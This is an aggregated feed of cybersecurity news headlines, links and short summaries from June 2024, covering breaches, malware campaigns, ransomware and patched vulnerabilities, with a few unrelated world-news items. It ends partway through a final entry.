          The 2022 Medibank data breach / extortion attack perpetrated by the REvil ransomware group started by the attackers leveraging login credentials stolen from a private computer of an employee of a Medibank’s IT contractor. According to a statement by the Australian Information Commissioner (AIC) filed with the Federal Court of Australia, the credentials were stolen by way of infostealer malware, after that employee “saved his Medibank username and password for a number of Medibank accounts … More

          The post Medibank breach: Security failures revealed (lack of MFA among them) appeared first on Help Net Security.

          "

          Autosummary: According to a statement by the Australian Information Commissioner (AIC) filed with the Federal Court of Australia, the credentials were stolen by way of infostealer malware, after that employee “saved his Medibank username and password for a number of Medibank accounts to his personal internet browser profile on the work computer he used to provide IT services to Medibank”, and then signed into his internet browser profile on his personal computer.


          Fraudely empowers SMBs to protect their employees against phishing attacks

          financial
          2024-06-18 https://www.helpnetsecurity.com/2024/06/18/fraudely-anti-phishing-solution/

          Fraudely announced a low-cost, setup-free solution to enable SMBs to immediately protect their employees against phishing attacks. Phishing scams remain one of the most prevalent cyber threats, costing businesses billions of dollars annually. These attacks attempt to trick employees into revealing sensitive information or clicking malicious links that can compromise entire networks. “SMBs are targeted by phishers because they often lack the resources, the infrastructure, and the training to recognize and stop phishing attacks,” says … More

          The post Fraudely empowers SMBs to protect their employees against phishing attacks appeared first on Help Net Security.

          "

          Autosummary: Fraudely’s anti-phishing solution includes: On-demand safety checks by phishing experts: Employees simply forward suspicious emails to Fraudely for our team to analyze and report back.


          Cybercriminals Exploit Free Software Lures to Deploy Hijack Loader and Vidar Stealer

          exploits ciber
          2024-06-18 https://thehackernews.com/2024/06/cybercriminals-exploit-free-software.html
          Threat actors are luring unsuspecting users with free or pirated versions of commercial software to deliver a malware loader called Hijack Loader, which then deploys an information stealer known as Vidar Stealer. "Adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of a Cisco Webex Meetings App (ptService.exe)," Trellix security

          Autosummary: Similarly, users who end up selecting the "Auto-fix" are displayed WebDAV-hosted files named "fix.msi" or "fix.vbs" in Windows Explorer by taking advantage of the "search-ms:" protocol handler.


          Suspects in Brazil judge kidnapping plot killed in jail

          latam
          2024-06-18 https://www.bbc.com/news/articles/clkk80pzw8vo
          The men were attacked while on a "sunbathing break" inside a prison in São Paulo state.

          Autosummary: "


          ONNX phishing service targets Microsoft 365 accounts at financial firms

          financial
          2024-06-18 https://www.bleepingcomputer.com/news/security/onnx-phishing-service-targets-microsoft-365-accounts-at-financial-firms/
          A new phishing-as-a-service (PhaaS) platform called ONNX Store is targeting Microsoft 365 accounts for employees at financial firms using QR codes in PDF attachments. [...]

          Autosummary: Includes true login, one-time passwords, country blocking, custom page titles, password loops, Telegram integration, and custom logos.


          VMware fixes critical vCenter RCE vulnerability, patch now

          exploits
          2024-06-18 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vcenter-rce-vulnerability-patch-now/
          VMware has issued a security advisory addressing critical vulnerabilities in vCenter Server, including remote code execution and local privilege escalation flaws. [...]

          Autosummary: Today, the vendor released fixes for three vulnerabilities, namely CVE-2024-37079, CVE-2024-37080, CVE-2024-37081, summarized as follows: CVE-2024-37079:


          Scathing report on Medibank cyberattack highlights unenforced MFA

          financial ciber
          2024-06-18 https://www.bleepingcomputer.com/news/security/scathing-report-on-medibank-cyberattack-highlights-unenforced-mfa/
          A scathing report by Australia's Information Commissioner details how misconfigurations and missed alerts allowed a hacker to breach Medibank and steal data from over 9 million people. [...]

          Autosummary: This data included customers' names, dates of birth, addresses, phone numbers, email addresses, Medicare numbers, passport numbers, health-related information, and claims data (such as patient names, provider names, primary/secondary diagnosis and procedure codes, and treatment dates).


          Data breach at Total Fitness exposed almost half a million people’s photos – no password required

          financial
          2024-06-18 https://www.bitdefender.com/blog/hotforsecurity/data-breach-at-total-fitness-exposed-almost-half-a-million-peoples-photos-no-password-required/
          UK-based gym chain Total Fitness has been accused of sloppy security, following the discovery of an unsecured database containing the images of 470,000 members and staff - all accessible to anyone on the internet, no password required. Read more in my article on the Hot for Security blog.

          Autosummary: A 47.7GB database belonging to the health club was discovered by cybersecurity researcher Jeremiah Fowler, who told The Register he had also uncovered images of members' identity documents, banking and payment card details, phone numbers, and even - in some cases - immigration records.


          VMware fixed RCE and privilege escalation bugs in vCenter Server

          exploits
          2024-06-18 https://securityaffairs.com/164659/hacking/vmware-fixed-vcenter-server-flaws.html
          VMware addressed vCenter Server vulnerabilities that can allow remote code execution or privilege escalation. VMware addressed multiple vCenter Server vulnerabilities that remote attackers can exploit to achieve remote code execution or privilege escalation. vCenter Server is a centralized management platform developed by VMware for managing virtualized environments. The vCenter Server contains multiple heap-overflow flaws, tracked […]

          Autosummary: "


          Microsoft says bug causes Windows 10 apps to display Open With dialogs

          exploits
          2024-06-18 https://www.bleepingcomputer.com/news/microsoft/microsoft-says-bug-causes-windows-10-apps-to-display-open-with-dialogs/
          Microsoft has confirmed that Windows 10 apps will mistakenly display a "How do you want to open this file?" dialog box when attempting to right-click on the program's icon and perform a registered task. [...]

          Autosummary: "Following installation of the Windows update released April 23, 2024 (KB5036979)and updates released after that, certain apps might display an "Open With" dialog box asking, "How do you want to open this file?"," reads the status update. "


          Hackers Exploit Legitimate Websites to Deliver BadSpace Windows Backdoor

          exploits
          2024-06-17 https://thehackernews.com/2024/06/hackers-exploit-legitimate-websites-to.html
          Legitimate-but-compromised websites are being used as a conduit to deliver a Windows backdoor dubbed BadSpace under the guise of fake browser updates. "The threat actor employs a multi-stage attack chain involving an infected website, a command-and-control (C2) server, in some cases a fake browser update, and a JScript downloader to deploy a backdoor into the victim's system," German

          Autosummary: "


          NiceRAT Malware Targets South Korean Users via Cracked Software

          exploits
          2024-06-17 https://thehackernews.com/2024/06/nicerat-malware-targets-south-korean.html
          Threat actors have been observed deploying a malware called NiceRAT to co-opt infected devices into a botnet. The attacks, which target South Korean users, are designed to propagate the malware under the guise of cracked software, such as Microsoft Windows, or tools that purport to offer license verification for Microsoft Office. "Due to the nature of crack programs, information sharing amongst

          Autosummary: "


          Online job offers, the reshipping and money mule scams

          financial
          2024-06-17 https://securityaffairs.com/164566/security/online-job-offers-reshipping-money-mule-scams.html
          Offers that promise easy earnings can also bring with them a host of scams that deceive those who are genuinely seeking income opportunities. Often, behind these enticing offers are pyramid schemes in which profits are generated through the recruitment of new participants, rather than through actual service, sometimes even causing significant financial losses. Other false […]

          Autosummary: The structure of this service, also known as “Drops for Stuff,” distinguished “drops,” people who responded to job ads from home to drop off packages, from “stuffers,” individuals in possession of stolen credit card numbers who paid a fee for drop-off to the Swat service. In this regard, the State Police’s latest operation “EMMA 9,” a vast action to combat cyber money laundering coordinated by Europol and conducted in 28 countries, uncovered 2,729 fraudulent transactions, identified 879 money mules and foiled fraud worth more than 6 million euros.


          Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle

          industry
          2024-06-17 https://www.helpnetsecurity.com/2024/06/17/argus-cyber-security-microsoft-collaboration/

          Argus Cyber Security is collaborating with Microsoft to build a next generation, end-to-end platform for automotive and mobility security. This Argus Vehicle Security Platform consists of two integrated solutions that combine Argus’ automotive cybersecurity portfolio with robust software development and security products from Microsoft, one of the world’s most innovative technology companies and a leader in GenAI. In recent years, vehicle manufacturers have come to realize the importance of Software Defined Vehicles (SDV) and integrating … More

          The post Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle appeared first on Help Net Security.

          "

          Autosummary: The second solution, known as “Automotive Security Lifecycle Management,” integrates the Argus XDR threat detection and response product for automotive on Azure with robust security operations and management tools from Microsoft, including Microsoft Sentinel, Defender for Cloud, Defender Threat Intelligence and Azure OpenAI Service.


          Malware peddlers love this one social engineering trick!

          exploits
          2024-06-17 https://www.helpnetsecurity.com/2024/06/17/social-engineering-malware-installation/

          Attackers are increasingly using a clever social engineering technique to get users to install malware, Proofpoint researchers are warning. The message warns of a problem but also offers a way to fix it (Source: Proofpoint) Social engineering users to install malware Getting users to install malware on their computers was always a matter of finding the right lure and bypassing security protections. As the latter get better (and broader) and users’ awareness of attackers’ usual … More

          The post Malware peddlers love this one social engineering trick! appeared first on Help Net Security.

          "



          LA County’s Department of Public Health (DPH) data breach impacted over 200,000 individuals

          financial government
          2024-06-17 https://securityaffairs.com/164585/data-breach/la-countys-department-of-public-health-dph-data-breach.html
          The County of Los Angeles’ Department of Public Health (DPH) disclosed a data breach that impacted more than 200,000 individuals. The LA County’s Department of Public Health announced that the personal information of more than 200,000 individuals was compromised after a data breach that occurred between February 19 and February 20, 2024. Threat actors obtained the […] "

          Autosummary: The compromised information varied for each individual, potentially exposed information included the patient’s first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service, and/or medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "


          Panera Bread likely paid a ransom in March ransomware attack

          exploits ransomware
          2024-06-17 https://www.bleepingcomputer.com/news/security/panera-bread-likely-paid-a-ransom-in-march-ransomware-attack/
          Panera Bread, an American chain of fast food restaurants, most likely paid a ransom after being hit by a ransomware attack, suggests the language used in an internal email sent to employees. [...] "

          Autosummary: Sadly, even paying a ransom does not guarantee the complete deletion of stolen data, with past incidents demonstrating that threat actors don't always keep their promise and data was sold to other threat actors, leaked on data leak sites, or used to extort the company again. "


          Hackers use F5 BIG-IP malware to stealthily steal data for years

          exploits
          2024-06-17 https://www.bleepingcomputer.com/news/security/hackers-use-f5-big-ip-malware-to-stealthily-steal-data-for-years/
          A group of suspected Chinese cyberespionage actors named "Velvet Ant" are deploying custom malware on F5 BIG-IP appliances to gain a persistent connection to the internal network and steal data. [...] "

          Autosummary: Sygnia reports that despite extensive eradication efforts following the breach's discovery, the hackers re-deployed PlugX with new configurations to avoid detection, using compromised internal devices like the F5 appliances to retain access. Other malware deployed on the F5 BIG-IP appliance includes: PMCD: connects to the C&C server hourly and executes commands received from the server via "csh", maintaining remote control. "


          (Almost) everything you always wanted to know about cybersecurity, but were too afraid to ask, with Tjitske de Vries: Lock and Code S05E13

          ciber
          2024-06-17 https://www.malwarebytes.com/blog/podcast/2024/06/almost-everything-you-always-wanted-to-know-about-cybersecurity-but-were-too-afraid-to-ask-with-tjitske-de-vries-lock-and-code-s05e13
          This week on the Lock and Code podcast, we speak with Tjitske de Vries to answer some of the most common cybersecurity questions we receive. "

          Autosummary: Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "


          China-linked Velvet Ant uses F5 BIG-IP malware in cyber espionage campaign

          exploits
          2024-06-17 https://securityaffairs.com/164598/apt/velvet-ant-malware-target-f5-big-ip.html
          Chinese cyberespionage group Velvet Ant was spotted using custom malware to target F5 BIG-IP appliances to breach target networks. In late 2023, Sygnia researchers responded to an incident suffered by a large organization that they attributed to a China-linked threat actor tracked as ‘Velvet Ant.’ The cyberspies deployed custom malware on F5 BIG-IP appliances to […] "

          Autosummary: The tool was utilized in the past by multiple China-linked APT groups, including ‘Volt Typhoon’, ‘APT27’ and ‘Gelsemium’. "


          Russian warships leave Cuba after five days

          rusia-ucrania
          2024-06-17 https://www.bbc.com/news/articles/ckrr8dn238yo
          The Russian fleet had been anchored just 90 miles from the US state of Florida. "



          Preventative defense tactics in the real world

          industry
          2024-06-17 https://www.welivesecurity.com/en/business-security/preventative-defense-tactics-real-world/
          Don’t get hacked in the first place – it costs far less than dealing with the aftermath of a successful attack "

          Autosummary: MFA can stop, or at least blunt, brute force attacks, especially Business Email Compromise (BEC), which is a perpetual concern. "


          Week in review: JetBrains GitHub plugin vulnerability, 20k FortiGate appliances compromised

          exploits
          2024-06-16 https://www.helpnetsecurity.com/2024/06/16/week-in-review-jetbrains-github-plugin-vulnerability-20k-fortigate-appliances-compromised/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051) JetBrains has fixed a critical vulnerability (CVE-2024-37051) that could expose users of its integrated development environments (IDEs) to GitHub access token compromise. 20,000 FortiGate appliances compromised by Chinese hackers Coathanger – a piece of malware specifically built to persist on Fortinet’s FortiGate appliances – may still be lurking … More

          The post Week in review: JetBrains GitHub plugin vulnerability, 20k FortiGate appliances compromised appeared first on Help Net Security.

          "

          Autosummary: New infosec products of the week: June 14, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Diligent, Entrust, KELA, Plainsea, and SentinelOne. GDPR turns six: Expert discusses AI impact In this Help Net Security video, Chris Denbigh-White, CSO at Next DLP, discusses how emerging technologies, such as AI, have presented new data protection challenges and how organizations must balance deployment and legality. "


          ASUS fixed critical remote authentication bypass bug in several routers

          exploits
          2024-06-16 https://securityaffairs.com/164549/security/asus-router-models-critical-rce.html
          Taiwanese manufacturing giant ASUS addressed a critical remote authentication bypass vulnerability impacting several router models. ASUS addresses a critical remote authentication bypass vulnerability, tracked as CVE-2024-3080 (CVSS v3.1 score: 9.8), impacting seven router models. The flaw is an authentication bypass issue that a remote attacker can exploit to log into the device without authentication. The flaw impacts […] "



          New ARM "TIKTAG" attack impacts Google Chrome, Linux systems

          Linux
          2024-06-16 https://www.bleepingcomputer.com/news/security/new-arm-tiktag-attack-impacts-google-chrome-linux-systems/
          A new speculative execution attack named "TIKTAG" targets ARM's Memory Tagging Extension (MTE) to leak data with over a 95% chance of success, allowing hackers to bypass the security feature. [...] "

          Autosummary: If the tags match, the value is forwarded, and the load succeeds, influencing the cache state, while in the case of a mismatch, the forwarding is blocked, and the cache state remains unchanged. "


          Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

          financial exploits latam
          2024-06-15 https://thehackernews.com/2024/06/grandoreiro-banking-trojan-hits-brazil.html
          Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S. "The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is "

          Autosummary: Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia. "


          Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

          exploits government
          2024-06-15 https://thehackernews.com/2024/06/pakistani-hackers-use-disgomoji-malware.html
          A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024. Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems. "It is a modified version of the public project "



          New Linux malware is controlled through emojis sent from Discord

          exploits Linux
          2024-06-15 https://www.bleepingcomputer.com/news/security/new-linux-malware-is-controlled-through-emojis-sent-from-discord/
          A newly discovered Linux malware dubbed "DISGOMOJI" uses the novel approach of utilizing emojis to execute commands on infected devices in attacks on government agencies in India. [...] "

          Autosummary: When DISGOMOJI is launched, the malware will exfiltrate system information from the machine, including IP address, username, hostname, operating system, and the current working directory, which is sent back to the attackers. "


          London hospitals canceled over 800 operations in the week after Synnovis ransomware attack

          exploits ransomware
          2024-06-15 https://securityaffairs.com/164541/cyber-crime/londol-hospitals-canceled-800-operations-ransomware.html
          NHS England confirmed that multiple London hospitals impacted by the ransomware attack at Synnovis were forced to cancel planned operations. NHS England confirmed that the recent ransomware attack on Synnovis had a severe impact on multiple London hospitals, forcing them to cancel hundreds of scheduled operations. Synnovis is a pathology partnership between Guy’s […] "

          Autosummary: O Negative blood is a universal blood type: anyone can receive it, so it is crucial in emergencies or when a patient’s blood type is unknown. “England’s top doctor has today (Monday 10 June) backed calls from NHS Blood and Transplant (NHSBT) for O Positive and O Negative blood donors to urgently book appointments to donate in one of the 25 town and city centre NHS Blood Donor Centres in England, to boost stocks of O type blood following the cyber incident in London.” “Unfortunately, some operations and procedures which rely more heavily on pathology services have been postponed, and blood testing is being prioritised for the most urgent cases, meaning some patients have had phlebotomy appointments cancelled.” "


          North Korean Hackers Target Brazilian Fintech with Sophisticated Phishing Tactics

          financial latam industry
          2024-06-14 https://thehackernews.com/2024/06/north-korean-hackers-target-brazilian.html
          Threat actors linked to North Korea have accounted for one-third of all the phishing activity targeting Brazil since 2020, as the country's emergence as an influential power has drawn the attention of cyber espionage groups. "North Korean government-backed actors have targeted the Brazilian government and Brazil's aerospace, technology, and financial services sectors," Google's Mandiant and "

          Autosummary: "Jade Sleet's packages, discovered throughout summer 2023, were designed to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality," Checkmarx researchers Tzachi Zornstein and Yehuda Gelb said. "


          City of Cleveland still working to fully restore systems impacted by a cyber attack

          government
          2024-06-14 https://securityaffairs.com/164506/hacking/city-of-cleveland-cyberattack.html
          Early this week, the City of Cleveland suffered a cyber attack that impacted multiple services. The City is working to restore impacted systems. On Monday, the City of Cleveland announced it was the victim of a cyber attack and was forced to take some of its systems offline to contain the threat. The City is […] "



          Two Ukrainians accused of spreading Russian propaganda and hacking soldiers’ phones

          rusia-ucrania
          2024-06-14 https://securityaffairs.com/164516/cyber-warfare-2/ukrainians-accused-russian-propaganda.html
          Ukraine’s security service (SBU) detained two individuals accused of supporting Russian intelligence in spreading propaganda and hacking soldiers’ phones. Ukraine’s security service, the SBU, detained two individuals who are accused of supporting Russian intelligence in spreading pro-Russia propaganda. They are also accused of hacking the phones of Ukrainian soldiers. The arrests result from an investigation conducted by […] "



          CISA adds Android Pixel, Microsoft Windows, Progress Telerik Report Server bugs to its Known Exploited Vulnerabilities catalog

          exploits
          2024-06-14 https://securityaffairs.com/164525/security/cisa-adds-android-pixel-microsoft-windows-progress-telerik-report-server-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Android Pixel, Microsoft Windows, Progress Telerik Report Server bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-32896 is an elevation of privilege vulnerability in the Pixel Firmware, which has been […] "



          Learn to Secure Petabyte-Scale Data in a Webinar with Industry Titans

          industry
          2024-06-14 https://thehackernews.com/2024/06/learn-to-secure-petabyte-scale-data-in.html
          Data is growing faster than ever. Remember when petabytes (that's 1,000,000 gigabytes!) were only for tech giants? Well, that's so last decade! Today, businesses of all sizes are swimming in petabytes. But this isn't just about storage anymore. This data is ALIVE—it's constantly accessed, analyzed, shared, and even used to train the next wave of AI. This creates a huge challenge: how do you "

          Autosummary: In this must-attend webinar, you'll learn: how to adapt your data security strategies to keep pace with explosive data growth; best practices for managing access control and monitoring in petabyte-scale environments; strategies for mitigating risks associated with third-party data access and data movement; insights into the unique security challenges posed by LLM model training; and future-proofing your data security approach for the era of big data. Whether you're a CISO, security engineer, IT professional, or business leader, if you're responsible for protecting your company's data, this webinar is essential. "


          London hospitals cancel over 800 operations after ransomware attack

          exploits ransomware
          2024-06-14 https://www.bleepingcomputer.com/news/security/london-hospitals-cancel-over-800-operations-after-ransomware-attack/
          NHS England revealed today that multiple London hospitals impacted by last week's Synnovis ransomware attack were forced to cancel hundreds of planned operations and appointments. [...] "

          Autosummary: While memos issued by hospital officials revealed this "ongoing critical incident" has had a "major impact" on their procedures and operations (including blood transfusions and blood testing), the NHS said two days after the incident that emergency services like A&E, urgent care centers, and maternity departments are open as usual although some operations and procedures relying on pathology services had to be postponed. "


          CISA warns of Windows bug exploited in ransomware attacks

          exploits ransomware
          2024-06-14 https://www.bleepingcomputer.com/news/security/cisa-warns-of-windows-bug-exploited-in-ransomware-attacks/
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity Windows vulnerability abused in ransomware attacks as a zero-day to its catalog of actively exploited security bugs. [...] "

          Autosummary: Since then, the gang has breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, the Toronto Public Library, the American Dental Association, government contractor ABB, Hyundai's European division, Yellow Pages Canada, and U.S. healthcare giant Ascension. "


          Truist bank confirms data breach

          financial
          2024-06-14 https://www.malwarebytes.com/blog/news/2024/06/truist-bank-confirms-data-breach
          On Wednesday June 12, 2024, a well-known dark web data broker and cybercriminal acting under the name “Sp1d3r” offered a significant... "

          Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Protecting yourself after a data breach: There are some actions you can take if you are, or suspect you may have been, the victim of a data breach. "


          Protests across Brazil over divisive abortion law

          latam
          2024-06-14 https://www.bbc.com/news/articles/cyxx17zeydyo
          Thousands gather in several cities to protest a law change that could equate abortion to homicide. "

          Autosummary: By Malu Cursino, BBC News. Thousands of people in Brazil have protested against a proposed nationwide law change which would equate abortion to homicide, even in cases where a pregnancy is the result of rape. "


          Keytronic confirms data breach after ransomware gang leaks stolen files

          financial exploits ransomware
          2024-06-14 https://www.bleepingcomputer.com/news/security/keytronic-confirms-data-breach-after-ransomware-gang-leaks-stolen-files/
          PCBA manufacturing giant Keytronic is warning it suffered a data breach after the Black Basta ransomware gang leaked 530GB of the company's stolen data two weeks ago. [...] "

          Autosummary: The threat actors claim that human resources, finance, engineering, and corporate data were stolen in the attack, sharing screenshots of employees' passports and social security cards, customer presentations, and corporate documents. "


          GenAI keeps cybersecurity pros on high alert

          ciber
          2024-06-13 https://www.helpnetsecurity.com/2024/06/13/businesses-ai-threats/

          “Businesses across every industry face unprecedented challenges posed by an increasing attack surface, zero-day vulnerabilities, cloud misconfigurations, and new emerging threats driven by AI,” said Andrei Florescu, president and GM of Bitdefender Business Solutions Group. “The findings of our recent survey underscore a now vital approach to cybersecurity that layers threat prevention, protection, detection, and response across all environments, including cloud infrastructure, services, and supply chains. The goal of effective cybersecurity is not only stopping … More

          The post GenAI keeps cybersecurity pros on high alert appeared first on Help Net Security.

          "

          Autosummary: At 73.5%, UK respondents experienced the most data breaches or leaks, Germany was at 61%, and Singapore experienced the least at 33% (24% below the average). "


          Google Warns of Pixel Firmware Security Flaw Exploited as Zero-Day

          exploits
          2024-06-13 https://thehackernews.com/2024/06/google-warns-of-pixel-firmware-security.html
          Google has warned that a security flaw impacting Pixel Firmware has been exploited in the wild as a zero-day. The high-severity vulnerability, tagged as CVE-2024-32896, has been described as an elevation of privilege issue in Pixel Firmware. The company did not share any additional details related to the nature of attacks exploiting it, but noted "there are indications that CVE-2024-32896 may be "



          New Cross-Platform Malware "Noodle RAT" Targets Windows and Linux Systems

          exploits Linux
          2024-06-13 https://thehackernews.com/2024/06/new-cross-platform-malware-noodle-rat.html
          A previously undocumented cross-platform malware codenamed Noodle RAT has been put to use by Chinese-speaking threat actors either for espionage or cybercrime for years. While this backdoor was previously categorized as a variant of Gh0st RAT and Rekoobe, Trend Micro security researcher Hara Hiroaki said "this backdoor is not merely a variant of existing malware, but is a new type altogether." "

          Autosummary: It's equipped to launch a reverse shell, download/upload files, schedule execution, and initiate SOCKS tunneling, with the attacks leveraging known security flaws in public-facing applications to breach Linux servers and drop a web shell for remote access and malware delivery. "


          PHP command injection flaw exploited to deliver ransomware (CVE-2024-4577)

          exploits ransomware
          2024-06-13 https://www.helpnetsecurity.com/2024/06/13/cve-2024-4577-exploited/

          An OS command injection vulnerability in Windows-based PHP (CVE-2024-4577) in CGI mode is being exploited by the TellYouThePass ransomware gang. Imperva says the attacks started on June 8, two days after the PHP development team pushed out fixes, and one day after Watchtowr researchers published a technical analysis of the flaw and proof-of-concept exploit code. About CVE-2024-4577: Discovered and reported by Orange Tsai, principal security researcher at Devcore, CVE-2024-4577 allows attackers to bypass the protections … More

          The post PHP command injection flaw exploited to deliver ransomware (CVE-2024-4577) appeared first on Help Net Security.

          "



          Pakistan-linked Malware Campaign Evolves to Target Windows, Android, and macOS

          exploits
          2024-06-13 https://thehackernews.com/2024/06/pakistan-linked-malware-campaign.html
          Threat actors with ties to Pakistan have been linked to a long-running malware campaign dubbed Operation Celestial Force since at least 2018. The activity, still ongoing, entails the use of an Android malware called GravityRAT and a Windows-based malware loader codenamed HeavyLift, according to Cisco Talos, which are administered using another standalone tool referred to as GravityAdmin. The "

          Autosummary: "For example, "FOXTROT," "CLOUDINFINITY," and "CHATICO" are names given to all Android-based GravityRAT infections whereas "CRAFTWITHME," "SEXYBER," and "CVSCOUT" are names for attacks deploying HeavyLift. "


          Cybercriminals Employ PhantomLoader to Distribute SSLoad Malware

          exploits ciber
          2024-06-13 https://thehackernews.com/2024/06/cybercriminals-employ-phantomloader-to.html
          The nascent malware known as SSLoad is being delivered by means of a previously undocumented loader called PhantomLoader, according to findings from cybersecurity firm Intezer. "The loader is added to a legitimate DLL, usually EDR or AV products, by binary patching the file and employing self-modifying techniques to evade detection," security researchers Nicole Fishbein and Ryan Robinson said in "



          Ukraine Police Arrest Suspect Linked to LockBit and Conti Ransomware Groups

          exploits ransomware
          2024-06-13 https://thehackernews.com/2024/06/ukraine-police-arrest-suspect-linked-to.html
          The Cyber Police of Ukraine has announced the arrest of a local man who is suspected to have offered his services to the LockBit and Conti ransomware groups. The unnamed 28-year-old native of the Kharkiv region allegedly specialized in the development of crypters to encrypt and obfuscate malicious payloads in order to evade detection by security programs. The product is believed to have been "

          Autosummary: "For nearly four years, Rui-Siang Lin allegedly operated "Incognito Market," one of the largest online platforms for narcotics sales, conducting $100 million in illicit narcotics transactions and reaped millions of dollars in personal profits," James Smith, the assistant director in charge of the FBI New York field office, said. "


          Update now! Google Pixel vulnerability is under active exploitation

          exploits
          2024-06-13 https://www.malwarebytes.com/blog/news/2024/06/update-now-google-pixel-vulnerability-is-under-active-exploitation
          Google revealed that a firmware vulnerability in its Pixel devices has been under limited active exploitation "

          Autosummary: Updates to address this issue are available for supported Pixel devices, such as Pixel 5a with 5G, Pixel 6a, Pixel 6, Pixel 6 Pro, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel 8, Pixel 8 Pro, Pixel 8a, and Pixel Fold. "


          Watch out! CISA warns it is being impersonated by scammers

          financial
          2024-06-13 https://www.tripwire.com/state-of-security/watch-out-cisa-warns-it-being-impersonated-scammers
          The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that scammers are impersonating its employees, in an attempt to commit fraud. Impersonation scams are on the rise, warns the agency. Read more, and learn how to protect yourself, in my article on the Tripwire State of Security blog. "

          Autosummary: Impersonation scammers will often put some effort into making their fraudulent communications look more convincing, such as spoofing phone numbers, email addresses, or even creating profiles on social media to appear as if they are from a government department, the police, or a bank. "


          Arid Viper Launches Mobile Espionage Campaign with AridSpy Malware

          exploits
          2024-06-13 https://thehackernews.com/2024/06/arid-viper-launches-mobile-espionage.html
          The threat actor known as Arid Viper has been attributed to a mobile espionage campaign that leverages trojanized Android apps to deliver a spyware strain dubbed AridSpy. "The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app," ESET researcher Lukáš Štefanko said in a report published today. "Often "

          Autosummary: Some of the fake-but-functional apps claim to be secure messaging services such as LapizaChat, NortirChat, and ReblyChat, each of which is based on legitimate apps like StealthChat, Session, and Voxer Walkie Talkie Messenger, while another app purports to be from the Palestinian Civil Registry. "


          Google fixed an actively exploited zero-day in the Pixel Firmware

          exploits
          2024-06-13 https://securityaffairs.com/164500/security/google-fixed-pixel-firmware-zero-day.html
          Google is warning of a security vulnerability impacting its Pixel Firmware that has been actively exploited in the wild as a zero-day. Google warned of an elevation of privilege vulnerability, tracked as CVE-2024-32896, in the Pixel Firmware, which has been exploited in the wild as a zero-day. “There are indications that CVE-2024-32896 may be under limited, […] "



          New York Times warns freelancers of GitHub repo data breach

          financial
          2024-06-13 https://www.bleepingcomputer.com/news/security/new-york-times-warns-freelancers-of-github-repo-data-breach/
          The New York Times notified an undisclosed number of contributors that some of their sensitive personal information was stolen and leaked after its GitHub repositories were breached in January 2024. [...] "

          Autosummary: The information stolen during the incident includes first and last names, as well as various combinations of affected individuals' phone numbers, email addresses, mailing addresses, nationality, bio, website URLs, and social media usernames. "


          Toronto District School Board hit by a ransomware attack

          exploits ransomware
          2024-06-13 https://www.bleepingcomputer.com/news/security/toronto-district-school-board-hit-by-a-ransomware-attack/
          The Toronto District School Board (TDSB) is warning that it suffered a ransomware attack on its software testing environment and is now investigating whether any personal information was exposed. [...] "



          Panera warns of employee data breach after March ransomware attack

          financial exploits ransomware
          2024-06-13 https://www.bleepingcomputer.com/news/security/panera-warns-of-employee-data-breach-after-march-ransomware-attack/
          U.S. food chain giant Panera Bread is notifying employees of a data breach after unknown threat actors stole their sensitive personal information in a March ransomware attack. [...] "

          Autosummary: As a result of this breach, Panera suffered a massive outage that affected its internal IT systems, phones, point of sales system, website, and mobile apps. "


          Exploit for Veeam Recovery Orchestrator auth bypass available, patch now

          exploits
          2024-06-13 https://www.bleepingcomputer.com/news/security/exploit-for-veeam-recovery-orchestrator-auth-bypass-available-patch-now/
          A proof-of-concept (PoC) exploit for a critical Veeam Recovery Orchestrator authentication bypass vulnerability tracked as CVE-2024-29855 has been released, elevating the risk of being exploited in attacks. [...] "

          Autosummary: "The 'knowing the username' problem 'kind of' can be solved with the following solution: assuming there exists a user named administrator@evilcorp.local, one can find the domain name by looking at the CN field of the SSL certificate, and the username can be sprayed," explain the researchers at the Summoning Team. "


          Bank fires employees over fake keyboard activity

          financial
          2024-06-13 https://www.bbc.com/news/articles/cjll01220yeo
          Wells Fargo has fired a number of workers, after reviewing claims of fake keyboard activity. "

          Autosummary: In the US, just under 27% of paid days last month were work-from-home days, compared with more than 60% at the height in 2020, according to research by professors at the Instituto Tecnológico Autónomo de México (ITAM) Business School, Stanford and University of Chicago. "


          Truist Bank confirms breach after stolen data shows up on hacking forum

          financial
